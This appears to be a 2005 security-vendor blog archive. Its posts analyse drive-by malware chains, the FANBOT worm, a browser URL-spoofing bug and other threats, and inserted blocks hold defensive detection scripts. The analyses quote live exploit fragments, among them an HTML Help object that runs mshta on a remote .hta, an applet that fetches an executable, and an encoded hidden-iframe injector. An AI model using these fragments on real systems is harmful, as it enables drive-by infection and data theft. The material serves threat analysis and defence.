
Mixed Threat Part 2: They Come Through Emails!

  • Posted: October 27, 2005
  • Author: Virus analysis staff



The thing about a mixed threat is that one piece of malware starts a chain of events which ultimately leaves a system infected with a number of other malware. Execution passes from one malware to the next until the flow is finished, by which time the system is already infected with anything that comes to the malware author's mind. It can be a trojan, spyware, even worms.

Here is a new example of this. The flow begins with an email which eventually leads to the system being infected by trojans…

Below is an email that was spammed just this October 22, 2005.



As you can see, the email provides a link, fooling the user into thinking that it leads to a copy of the transaction invoice.

When this link is clicked, it starts a chain of events which we now call the “Bouncing Malware” (ala SANS). =)
When loaded, the site informs the user that an “INTERNAL SERVER ERROR” occurred. Below is a picture of the website.



No alarm there, right?… Wrong! =) The source code of this site shows that it contains an iframe exploit, which loads these two URLs:

“http://nlpshoping.com/huindex.html”
“http://nlpshoping.com/estat.php”

The file estat.php turned out to be a “zero byte file”, but huindex.html is “very bad”.

This HTML file loads http://nlpshoping.com/loader.exe using a Java applet.

Here is a code snippet from huindex.html:

<APPLET CODE="GetAccess.class" WIDTH="1" HEIGHT="1">
<PARAM NAME="cabbase" VALUE="{blocked}.jr">
<param NAME="ModulePath" value="http://nlpshop{block}ader.exe"></applet>
</APPLET>

It then uses another exploit, a vulnerability in HTML Help (MS05-001), which allows http://nlpshoping.com/ppp.hta to be downloaded and run:

<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
style="position:absolute;left:-1000">
<PAR{BLOCKED}ommand" VALUE="Related Topics">
<PAR{BLOCKED}utton" VALUE="Text:">
<PAR{BLOCKED}indow" VALUE="$global_blank">
<PAR{BLOCKED}tem1" VALUE="command;javascript:document.links[0].href='EXEC=,mshta,http://nlpshoping.com/ppp.hta
CHM=ieshared.chm FILE=app_install.htm'%3Bdocument.links[0].click();"></OBJECT>


The file ppp.hta is a TROJAN DROPPER. It contains a VBScript which drops the file upgrade.exe in “c:\windows”.

The files Upgrade.exe and loader.exe are just the same.

They download these exe files:





  • http://nlpshoping.com/notepad.exe

  • http://site.com/toolbar.exe1

  • http://site.com/proxy.exe1

  • http://site.com/4.exe1

  • http://site.com/5.exe1


I tried getting the files from site.com but it was already down. But notepad.exe is still uploaded.

The file notepad.exe is also a TROJAN DROPPER. Among the files that it drops in the system directory are:



  • winsetup.exe

  • svchost.dll

All files have already been submitted to the service team and are waiting for their detection name.

So let’s review what we’ve got so far.



  • an email that fools users into clicking a link (http://nlpshoping.com/billing/order203401.html).
  • a site (http://nlpshoping.com/billing/order203401.html) that uses an IFRAME exploit to load another site (http://nlpshoping.com/huindex.html).
  • huindex.html, using an exploit in the handling of Java applets, loads a file named “LOADER.EXE”.
  • It also exploits a vulnerability in HTML HELP (MS05-001) to load http://nlpshoping.com/ppp.hta.
  • ppp.hta contains a VBScript which drops “UPGRADE.EXE”.
  • Don’t forget: “UPGRADE.EXE” and “LOADER.EXE” are the same file.
  • These two files are just downloaders which download the file http://nlpshoping.com/notepad.exe, among others, but the other sites are already down.
  • The file notepad.exe is a TROJAN DROPPER which installs another trojan in the system (winsetup.exe and svchost.dll).
  • The files winsetup.exe and svchost.dll monitor Internet Explorer and steal user information.

Whew! So this is why it’s called a “MIXED THREAT”.

But let’s not forget that this whole chain of events started with a single email, one that was crafted to make users believe that it was authentic. The real trigger for the “chain of events” is the moment the user was fooled into clicking that link. Yes, he was socially engineered, and so was used by the malware author to execute his trojan.

So as a fair warning, let’s be vigilant. Always check where your emails come from, and even then check the attachments if there are any. Plus of course it always helps to have a completely patched system.


A Mixed Threat Adventure

  • Posted: October 27, 2005
  • Author: Virus analysis staff

Mixed threats are becoming more and more common nowadays. Most of the time, users don’t even know what hit them until it’s too late. Just visit a site, which REALLY looks like a legitimate one by the way, and presto – you have your instant adware, spyware, backdoors, trojans or even worms roaming free and undetected in your system!

We have reported many examples of what we may call Mixed Threat Adventures or mal-Adventures in the past, but here’s one current example that is still out there in the wild, so to speak!

This site, http: //www.freedailyjigsawpuzzles.com/, REALLY just looks like a normal website offering free jigsaw puzzles.




But by looking at the code of this would-be “Normal Website”, I saw this – a JavaScript which is encoded using the escape command.

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D
%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C
%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62
%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F
%69%66%72%61%6D%65%3E'));


which, when unescaped, uses an iframe exploit to load another website,
http://www.pfl-enlarge.com.
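
A defender can recover the hidden iframe without rendering the page. The following added example (not part of the original post) decodes the unescape() payload quoted above as plain text and reports zero-size iframes; the function names are illustrative.

```javascript
// Added example, not code from the original post. The page source is handled
// purely as text: nothing is fetched, rendered or executed.

// The encoded script quoted in the post, joined onto one line.
const PAGE_SAMPLE =
  "document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D" +
  "%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C" +
  "%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62" +
  "%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F" +
  "%69%66%72%61%6D%65%3E'));";

// Decode %XX and %uXXXX in one pass, as the legacy unescape() would.
function decodeEscapes(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, h) =>
    String.fromCharCode(parseInt(u || h, 16)));
}

// Collect the string literals passed to unescape(...), tolerating line wraps.
function extractUnescapeArgs(source) {
  const out = [];
  for (const m of source.matchAll(/unescape\(\s*(['"])([\s\S]*?)\1\s*\)/g)) {
    out.push(m[2].replace(/[\r\n]+/g, ""));
  }
  return out;
}

// Read one attribute (double-quoted, single-quoted or bare) from an opening tag.
function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, "i");
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// An iframe is treated as hidden when width or height is 0 or 1, or CSS hides it.
function findIframes(html) {
  const tiny = (v) => v !== null && /^[01](px)?$/i.test(v.trim());
  return [...html.matchAll(/<iframe\b[^>]*>/gi)].map(([tag]) => {
    const width = attr(tag, "width");
    const height = attr(tag, "height");
    const style = (attr(tag, "style") || "").toLowerCase();
    const hidden = tiny(width) || tiny(height) ||
      /display\s*:\s*none|visibility\s*:\s*hidden/.test(style);
    return { src: attr(tag, "src"), width, height, hidden };
  });
}

// Scan the raw source (layer 0), then each decoded unescape() payload in turn.
// maxDepth bounds nested encodings so hostile input cannot loop forever.
function analyze(source, maxDepth = 3) {
  const findings = findIframes(source).map((f) => ({ ...f, layer: 0 }));
  let layer = [source];
  for (let depth = 1; depth <= maxDepth && layer.length > 0; depth++) {
    const next = layer.flatMap((s) => extractUnescapeArgs(s)).map((s) => decodeEscapes(s));
    for (const decoded of next) {
      for (const f of findIframes(decoded)) findings.push({ ...f, layer: depth });
    }
    layer = next;
  }
  return findings;
}

console.log(analyze(PAGE_SAMPLE));
```

The `layer` field shows how many decoding passes were needed before the iframe became visible in the text, which is useful when triaging pages that nest several encodings.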

This website in turn loads another site, http://www.britroadsters.com, again using the iframe exploit.

The http://www.britroadsters.com site checks the browser application. If the browser is “Microsoft Internet Explorer”, it loads the file enter.php; if not, it loads the file all.php. It doesn’t really matter, however, since both of these files just load another website, again using an iframe exploit, which leads to
http://www.secretadvise.biz/news.html.

Hehe… In the words of my TL, this is just like following the bouncing ball of malware.

So in the site http://www.secretadvise.biz/news.html, which is reeeally an “evil” site, there is a JavaScript (again encoded with the escape command) which exploits the Microsoft HTML Help Vulnerability (MS04-013) and ultimately downloads and executes a file named “Style.css”.

Here is an image of the decoded script from news.html.



Voila! The exploit code can now be seen… and a mysterious style.css file…

From website links, now we go to files downloaded

Don’t be fooled by the extension – Style.css is actually a chm file which drops an exe file named open.exe. There, now we’re getting somewhere! :) hehe.. But that’s not where it ends…

The file open.exe is also just a downloader and downloads a file from
http://www.secretadvise.biz/girl.bmp. And this “bmp” file is – hold your horses – a backdoor!

The files have been sent to the service team for signature generation and here’s the reply. The files will be detected as such:

News.html (1,998 bytes) – JS_WONKA.B
Style.css (13,016 bytes) – CHM_DROPPER.CN
Open.exe (2,608 bytes) – TROJ_DLOADER.AJH
Girl.bmp (50,920 bytes) – BKDR_HAXDOOR.CT

So let us review: just by visiting a seemingly normal and non-malicious site, the system will be infected with 4 malwares. Plus there’s the added bonus of having a malicious user hack into your system because of BKDR_HAXDOOR.CT!

So for those Net-Surfers out there, just keep in mind what sites you go to. Plus of course it’s always a good thing to have your systems patched and your pattern files updated. :)


Stalking the Fanbot

  • Posted: October 27, 2005
  • Author: Virus analysis staff

Brief History

During the first quarter of 2005, the advent of the family of mass-mailing bot-worms called MYTOBs gave rise to the vast proliferation of so-called BOT creators or groups that thrive on and make use of the modularity, functionality and “effectiveness” of the open-source codes. I will refer to the MYTOB open source as “Hellbot” since this underground entity has been tagged as one of the most prolific in the MYTOB scene.

Barely 7 months after, one Moroccan worm writer from the MYTOB scene who goes by the handle Diabl0, along with a Turkish partner code-named Coder, rose up from the ranks and released the ZOTOB variants, and they came with a blast! Incorporating a modified MYTOB code tagged as HellBot3 and an exploit code that targets the MS05-039 vulnerability barely 3 days after the patch release, the blast eventually became an outbreak! Even though the first two variants did not have the code for mass-mailing, it is quite evident that the MYTOB or MYDOOM code was there, and it wouldn’t be long before a mass-mailing ZOTOB appeared, and it did!

Other “upgraded” BOTs (IRCBOTs, SDBOTs, BOZORIs) with the same exploit soon multiplied, with the intent of outdoing each other in the BOTNET arena and waging war to grab hold of each other’s zombie networks for their own malicious ends. The war soon petered out, and the original ZOTOB worms eventually died down when Diabl0 and Coder got arrested barely two weeks after. Copycat ZOTOBs still appeared though, and it should be obvious that other script-kiddie groups were and still are the ones responsible, what with the HellBot and HellBot3 source codes out in the open for them to cut-and-paste, modify, compile, re-compile, pack and/or compress using new and unconventional file-packers, compressors or encryptors.

Come September, a HellBot-group splinter script-kiddie known in the Chinese cyber-underground community as x140yu, with the help of another kiddie known as x140d4n, was developing a modified version of the MYTOB modules. By the first week of October, the project was released in the wild. Its name: FANBOT!

FANBOT vs MYTOB

For those asking how FANBOT differs from MYTOB and whether it has the same robust spreading potential, the information below may shed some light …

Yes .. this IS exactly what it is… a MYTOB plus a PNP (MS05-039) exploit code PLUS some other factors which make it different (at one point or another):

1) Incorporation of a fake message box upon execution of the worm such as this:




2) Propagation via P2P (Peer-to-Peer) or file-sharing networks such as Kazaa, eDonkey and Morpheus, using filenames that target a diverse audience, including would-be virus analysts and writers alike, such as:



  • Bifrost.scr
  • How to hack new.doc.exe
  • how to hack.doc.exe
  • netsky source code.scr
  • Smashing the stack full.rtf.exe
  • virii.scr
  • Visual Studio Net Crack all.exe
  • Win Longhorn re.exe
  • Win Longhorn.doc.exe
  • Windows 2000 Sourcecode.doc.exe
  • Windows 2003 crack.exe
  • Windows XP crack.exe

3) This FANBOT family is not the brainchild of any of the conventional MYTOB groups, nor of course of the ZOTOB creator (since he is behind bars already) – but the creation of an altogether different individual (presumably) that goes by the handle of x140yu with an email address of x140yu@Gmail.Com. He even specifically “points out” in some of his creations that he created this new line out of MYDOOM+SDBOT and explicitly lets out that the MYTOB “author is an idiot!!!” (see text found in the worm code below) and kills processes related to MYTOB such as hellmsn.scr and msnmsgs.exe, those related to BOZORI such as botzor.exe, and other bots such as coolbot.exe.


[Phantom] 2005 Made By Evil[xiaou]. Greetz to good friend x140d4n. Based On sdbot&&mydoom.
HellBot3 have BackDoor in ‘HellMsn.h’. The HellBot3 author is an idiot!!!
MSG to Kaspersky&Norton: can u make it difficulty next time!!! stupid. dont call me Fanbot,i am [Phantom]!!! SHIT!!!
Play with The best, Die like the rest.

4) One particularly unique thing about this worm family is that it is the first to also target the Trend Micro System Cleaner by killing off any running processes of TSC.EXE.

5) Also unique in the mass-mailing bot domain, some later members of the FANBOT family now bank on the popularity of Skype, as can be seen in most of the attachments the family sends out (example: Share Skype, Skype, Skype for Windows 1.4, Skype-details, Skype-document or Skype-stuffs). Email characteristics of this type include:

Subject: (any of the following)


  • Share Skype

  • Share Skype.

  • Skype

  • Skype for Windows 1.4

  • Skype for Windows 1.4 – Have you got the new Skype?

  • Skype-details

  • Skype-document

  • Skype-info

  • Skype-stuffs

  • What is Skype?

Message Body


Dear user {name of recipient},

Skype is a little piece of software that lets you talk
over the Internet to anyone, anywhere for free.
download the latest version of Skype:
And it just got even better Our call quality is the best ever for talking, laughing and sharing stories.
You can forward calls on to mobiles, landlines
and other Skype Names. Make calls instantly from Outlook email or
Internet Explorer with our new toolbars. play around with sounds, ringtones and pictures to show the world who you are.
Personalise your Skype For further details see the attached document.

(c) 2002-2005 by Skype Technologies S.A.
Legal information

This message contains graphics. If you do not see the graphics,
click here to view.

Attachment: (any of the following file names)


  • readme

  • Share Skype

  • Skype

  • Skype for Windows 1.4

  • Skype-details

  • Skype-document

  • Skype-info

  • Skype-stuffs


(with any of the following first extension names)


  • BAT

  • CMD

  • EXE

  • PIF

  • SCR

  • ZIP

6) FANBOT continually updates its creations by having his newer versions KILL OFF his older ones found in any target systems (like deleting phantom.exe, xiaoyu.exe, etc.)

7) Via port 5262, the IRC server jojogirl.3322.org is also being connected to by the worm family.

8) Interestingly, the worm family also attempts to connect to 28.76.115.50 which is connected to the DoD!
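
The file-name tricks in items 2) and 5), a document-looking first extension followed by an executable one and attachment names paired with BAT, CMD, EXE, PIF, SCR or ZIP, can be screened for at a mail gateway or file share. The classifier below is an added example, not code from the original post; the verdict names, the extra decoy extensions and the two padded file names are assumptions made for illustration.

```javascript
// Added example, not code from the original post. It classifies file names the
// way a mail gateway or file-share scanner could, using the lists in 2) and 5).

// Executable extensions the post lists for FANBOT attachments (ZIP is handled apart).
const EXECUTABLE = new Set(["bat", "cmd", "exe", "pif", "scr"]);
// Harmless-looking "first" extensions: doc and rtf occur in the post's file names;
// txt, pdf and jpg are assumptions added for illustration.
const DECOY = new Set(["doc", "rtf", "txt", "pdf", "jpg"]);

function classify(filename) {
  // The Win32 API strips trailing dots and spaces, so "x.exe. " still runs as .exe.
  const name = filename.replace(/[. ]+$/, "");
  // Trim each part so padding such as "a.doc      .exe" cannot hide the decoy.
  const parts = name.split(".").map((p) => p.trim().toLowerCase());
  if (parts.length < 2) return "no-extension";
  const last = parts[parts.length - 1];
  const prev = parts.length > 2 ? parts[parts.length - 2] : null;
  if (last === "zip") return "archive-needs-unpacking";
  // A version number such as "1.4" is not an extension and falls through here.
  if (!EXECUTABLE.has(last)) return "not-executable";
  return prev !== null && DECOY.has(prev) ? "double-extension" : "executable";
}

const SEVERITY = {
  "no-extension": 0, "not-executable": 0,
  "archive-needs-unpacking": 1, executable: 2, "double-extension": 3,
};
const ACTION = ["deliver", "unpack-and-rescan", "block", "block"];

// Decide one action for a whole message or share listing: the worst file wins.
function triage(files) {
  const findings = files.map((file) => ({ file, verdict: classify(file) }));
  const worst = Math.max(0, ...findings.map((f) => SEVERITY[f.verdict]));
  return { action: ACTION[worst], findings };
}

// P2P names are taken from the post's list; mail names combine the post's
// attachment names and extensions; the last two are constructed edge cases.
const P2P_NAMES = ["Bifrost.scr", "how to hack.doc.exe", "Smashing the stack full.rtf.exe",
  "Win Longhorn re.exe", "Windows 2000 Sourcecode.doc.exe"];
const MAIL_NAMES = ["Skype for Windows 1.4.pif", "Skype-details.zip", "readme"];
const CONSTRUCTED = ["report.doc      .exe", "notes.exe. "];

console.log(triage(P2P_NAMES), triage(MAIL_NAMES), triage(CONSTRUCTED));
```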

Introducing the worm author

Looking at the text found in the worm body shown below, it can be seen this x140yu also has a “friend” that goes by the nickname of x140d4n – from whom I gather x140yu got some of his code modules or techniques. (The entity x140d4n has got a site LOADED with backdoors and Trojans and I am digging deeper in this site as I speak!)… x140yu probably got some backdoor techniques and code modules from this x140d4n.


Play with the best, Die like the rest.
[Phantom] 2005 made by Evil[xiaou]. Special Thanks:x140d4n.
If u have Zotob’s SourceCode, please u mail it to me!!!
E-mail:x140yu@Gmail.Com thanks!!!

And yes, as I’ve mentioned earlier, the author was still struggling just last September on perfecting his creation(s), and maybe x140d4n came to his “rescue”, ergo the Special Thanks. Seen below is one example of evidence traced regarding x140yu’s early days of bot-coding struggle … x140yu WAS asking for source codes! Tsk tsk …




You can also catch him (x140yu) here:

QQ: 75…71
ICQ: 30…78
MSN: x…@…com
E-mail: x…@…com
Gmail: x…@…com

*** Email us if you need the exact contact emails and we’ll send them over _IF_ the reason _IS_ for valid and legitimate purposes _ONLY_.

x140yu also has a blogsite, as shown below. The author really has something for alphanumeric text strings!




A further cursory glance at the site reveals some more interesting things.




Hmmm .. Aha!… A BotNet?!?! The link is empty though, and milworm! Ahhh yes … this is the site (milworm) where some of the more famous exploit codes that caused outbreaks in the past have been posted. Exploit codes such as those used by SASSER and ZOTOB are posted here. And going by one of the strings found in FANBOT’s code above, this is one proof the author really wants to grab any code related to ZOTOB!

What’s more, we’ve also got a snapshot of x140yu taken from the worm author’s blogsite titled “x140yu’s Photo”.


Apparently, x140yu alone or both x140yu and x140d4n are members of or in cahoots with the Brazilian-Persian “Evil Security Team” hacker group in spreading this worm, as can be seen in the mutex it creates:



___—>>[E-v-i-l_S-e-c-u-r-i-t-y_T-e-a-m]<<<—___


Their site is located at 210.1183 and is located in Korea. It is maintained by someone called “M3hDy EviL b0y”.




What Next?

All in all, my take on this is that this is just one of those more-than-average kiddies who’s gotten the opportunity to an open HellBot, some MYDOOM and some MS05-039 exploit source codes, added his own modifications and who’s got probably some word-war with some of the MYTOB groups in the underground – and voila – a new worm!

Moreover, this is just another example of the growing intent of bot creators of infiltrating and amassing more and more zombie networks either by affecting new targets or by competing against other worm-bot authors and take hold of the zombie networks for their own purposes.

Same old same old… but like all kiddie-works, this may have some high moments (like now and probably in the next two months or so) until it just peters out eventually, or when the kiddie(s) move on to a next “pet-project” or when authorities do get a hold of them… or him… or her!… ;-p

If we should do something to stop or prevent even a starting rampage of a new worm author’s creations, we should stop it, him or her or them before they increase in the near future. The information above is a starting point, and we can… and should stop it now …



New Skype Vulnerabilities

  • Posted: October 27, 2005
  • Author: Virus analysis staff

Skype, a little program for making free calls over the internet, announced two vulnerabilities in its code.


Read more about it here and here.


So for Skype users out there, an updated version which addresses
the vulnerabilities mentioned above is already uploaded in this site.


(Yet Another) URL Spoofing Bug

  • Posted: October 21, 2005
  • Author: Virus analysis staff

Another URL spoofing bug affecting at least two browsers has been discovered. It was first reported as a URL spoofing vulnerability in Internet Explorer. Subsequent discussions revealed that Firefox is also vulnerable.

To create such a bug, start off with a simple link tag: <a href=""> </a>

Then, within that tag, include an onClick() event, which is triggered when the link is clicked. Use the onClick event to run JavaScript that redirects the browser to a web page of your choice.

As you may have noticed, the redirection is done through Javascript. The redirection script can be modified such that an attacker can employ this to execute custom Javascript of the attacker's choosing. For example, it could be leveraged to perform a cross-site scripting attack.

And since this is a spoofing bug, it could be used for phishing or luring unsuspecting users into clicking malicious URLs.

Workaround

Disabling Javascript support in your browsers is an effective workaround for this spoofing bug.
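
For site owners and for mail or proxy filters, the mismatch itself is detectable in markup. This added example (not from the original post or its demo page) audits anchor tags for onclick handlers whose navigation target differs from the visible href; the sample markup and all function names are constructed for illustration.

```javascript
// Added example, not code from the original post. It audits anchor tags for
// onclick handlers that navigate somewhere other than the href the user sees.

// Attribute values are entity-decoded by the browser before the handler runs.
function decodeEntities(s) {
  const named = { quot: '"', apos: "'", amp: "&", lt: "<", gt: ">" };
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|(quot|apos|amp|lt|gt));/gi, (m, hex, dec, name) => {
    if (name) return named[name.toLowerCase()];
    const cp = hex ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Tokenise attributes left to right so that "href=" inside an onclick value is
// not mistaken for the real href. The first occurrence of a name wins.
function parseAttrs(tag) {
  const attrs = Object.create(null);
  const re = /([^\s"'<>\/=]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  for (const m of tag.matchAll(re)) {
    const name = m[1].toLowerCase();
    if (!(name in attrs)) attrs[name] = decodeEntities(m[2] ?? m[3] ?? m[4]);
  }
  return attrs;
}

// Navigation sinks with a literal string target. Computed targets are not
// resolved and are reported as "script-on-click" for manual review.
const NAV_PATTERNS = [
  /\blocation(?:\.href)?\s*=\s*(['"])(.*?)\1/i,
  /\blocation\.(?:replace|assign)\(\s*(['"])(.*?)\1/i,
  /\bwindow\.open\(\s*(['"])(.*?)\1/i,
];

function navTarget(handler) {
  const hit = NAV_PATTERNS.map((re) => re.exec(handler)).find((m) => m !== null);
  return hit ? hit[2] : null;
}

// Hostname of url, resolved against base when url is relative; null if unparsable.
function hostOf(url, base) {
  for (const b of [undefined, base]) {
    try { return new URL(url, b).hostname.toLowerCase(); } catch { /* try next */ }
  }
  return null;
}

function auditLinks(html) {
  const report = [];
  // Quoted attribute values may contain ">", so skip over them to find the tag end.
  for (const [tag] of html.matchAll(/<a\b(?:[^>"']|"[^"]*"|'[^']*')*>/gi)) {
    const { href = null, onclick = null } = parseAttrs(tag);
    if (onclick === null) continue;
    const target = navTarget(onclick);
    let verdict = "script-on-click";
    if (target !== null) {
      const shown = hostOf(href);
      const actual = hostOf(target, href || undefined);
      verdict = actual !== null && actual === shown ? "same-host" : "destination-mismatch";
    }
    report.push({ href, target, verdict });
  }
  return report;
}

// Constructed sample markup modelled on the two demo links described in the post.
const SAMPLE = [
  `<a href="http://google.com" onclick="location.href='http://trendmicro.com'; return false;">Google</a>`,
  `<a href="http://google.com" onclick="alert('hello'); return false;">Google</a>`,
  `<a href="http://example.com/a" onclick="location.href='/b'; return false;">docs</a>`,
  `<a href="http://google.com" onclick="location.href=&#39;http://trendmicro.com&#39;">Google</a>`,
  `<a href="http://example.com/">plain link</a>`,
].join("\n");

console.log(auditLinks(SAMPLE));
```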

Demo

Click on any of the URLs below for a demonstration. See the underlying source code to see how the URL spoofing works. And yes, all links are safe.


Redirect to trendmicro.com, even though the URL says "http://google.com"

Google

Pop a message box

Google


Tested on:


  • IE 6, Windows XP SP2
  • Firefox v1.0.7, Windows XP SP2


Snort Buffer Overflow

  • Posted: October 20, 2005
  • Author: Virus analysis staff

First, a little light:
[Start Quote]
“Snort is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.”
[End Quote] www.snort.org

Two days ago, ISS released an advisory on a buffer overflow on Snort which may be used by worms. I admit I wasn’t paying too much attention to this when the advisory was released because… well.. because nothing hehehehe. Eeeeeniwey, what caught my attention was ISC’s Infocon Yellow, and after reading their reasoning on why this ‘is a big deal’, I thought “Oh yeeah, it IS a big deal”. Think Witty.

Excerpts from ISC:
[Start Quote]
Why do we think this is a big deal:


  • The exploit is rather easy to write. Yes, its specific to a particular binary, but there are a number of common binaries deployed in large numbers.
  • It uses a single UDP packet, which can lead to very fast spreading worms.
  • The UDP packet can be spoofed, and can use any port combination.
  • Snort is very popular. A fast spreading (noisy) UDP worm could lead to local slowdowns/outages.
[End Quote]

So anyway, Paul and I were trying to create a POC for this (since we couldn’t find one), when suddenly! (for added drama hehehe), a new post from Full-Disclosure came in which carried a POC (albeit unfinished: only crashes target machine) for the Snort exploit (by H.D. Moore of Metasploit). Oh well. At least creating a complete POC (with shellcode) will be much easier since H.D. Moore already started it hehehehe and NVW only needs the code that causes the exploit. Also, the NVW team has already been alerted on this issue as well as the POC.


Virus Advisory: PE_NOFACE.B

  • Posted: October 18, 2005
  • Author: Virus analysis staff

We have received reports of an overwriting virus infecting some computers in China. This infector searches for files in the system and overwrites them with all 69KB of its code. After the virus is done with a file, the file is rendered useless and unrecoverable.

Since the virus is only 69KB in size, files which have more than that number of bytes retain their sizes, but their extra bytes will no longer function. As for files smaller than 69KB, they become purely 69KB of virus code.


This virus is now detected as PE_NOFACE.B.


SYMBOS_COMWAR.C

  • Posted: October 18, 2005
  • Author: Virus analysis staff

We have received a sample of a Symbian malware that exhibits the same behaviour as the SYMBOS_COMWAR family.


The first generation of the malware arrives as one of the files
inside a pirated copy of SymCommander software. SymCommander is a
file management software specifically used for Symbian
phones.


The actual malicious file inside the pirated copy of SymCommander
SIS package is named cwoutcast.exe. Just like the other
SYMBOS_COMWAR variants A and B, it also propagates through MMS by
sending a copy of itself as a .SIS installer. It also propagates
through Bluetooth by sending itself in a randomly generated
filename.


Also noticeable is the string embedded in cwoutcast.exe, quoted below.

“CommWarrior Outcast: The dark side of Symbian
Force.

CommWarrior v2.0-PRO. Copyright (c) 2005 by e10d0r

CommWarrior is freeware product. You may freely distribute it

in it’s original unmodified form.

With best regards from Russia.


OTMOP03KAM HET!”



Update
The sample has been given the detection name
SYMBOS_COMWAR.C.


Walk the talk

  • Posted: October 18, 2005
  • Author: Virus analysis staff

Cellphones may well top the list of items most likely to be stolen. They may even be more desirable now than wallets, jewelry and watches. It is easy money for thieves because there’s no scarcity of prospective buyers.


One of the latest technologies devised to *hopefully* lessen, if not completely eradicate, cellphone theft is a “Walking style-based recognition” system, which ties the mobile device to the way the owner walks. Yep, you heard it right, the way the owner walks. Its main principle is based on gait, which refers to the different aspects of a user’s movement. The system has various sensors to measure the user’s gait. Of course, upon purchase, measurements of the user’s “gaitcode” would be taken and stored in memory, and would be checked periodically. This checking is performed automatically and doesn’t require any input from the owner. If the gaitcode doesn’t match, the device would shut down, and would require proper authentication in order to be reactivated.


This method certainly sounds promising because it could also be applied to other electronic gadgets which cater to our various personal needs, such as laptops, PDAs, iPods, etc.


This would mean that these personal gadgets would certainly have to be personal. Borrowing or lending them are big no-no’s, because only the authentic owner whose gaitcode matches the one in the device would be able to use it. Come to think of it, even the registered owner may find instances where the device won’t work for them. Depending on how the sensors are placed, or how they measure the movement, certain situations would lead to changes in movement. These include impaired movement when you’re injured and must limp, a difference in the way you walk due to uncomfortable shoes, or a difference in the pavement you walk on. There are still lots of questions and what-ifs with regard to the use of gaitcode for security enforcement. Let’s just wait and see if it will actually be implemented…


Click this for the news.


Microsoft Windows Vista Meets The First Nemesis

  • Posted: October 18, 2005
  • Author: Virus analysis staff

If you have been reading the news, you may have heard of the much-awaited, much-delayed operating system succeeding Windows XP. The beta version of the software, previously known by its code name Longhorn and now called Windows Vista, is now available. That is big news, and so is the first virus infecting it.


On the face of it, it is not actually a major threat, and it can be placed in line with some of the other proof-of-concept malware or viruses. But it can also be seen as an effort by virus-writer groups to target new (Microsoft) platforms at the earliest time possible (in this case, Microsoft .NET Framework 2.0, which is included in Windows Vista beta 1), even if the target platform is still in beta! Whew!


And as we know… MS Vista will indeed be big…


Let’s hold on to our horses… the MS Vista malware scene will sure
be interesting in the near future!


The malware sample is now being processed by the Service Team so
hang on for updates.


Update
The file is now given the name PE_DONUT.B. Based on initial analysis, this malware runs on Microsoft Vista under Microsoft .NET Framework 2.0 and tries to overwrite EXE files in the current directory.

  • Copyright © 2021 Trend Micro Incorporated. All rights reserved.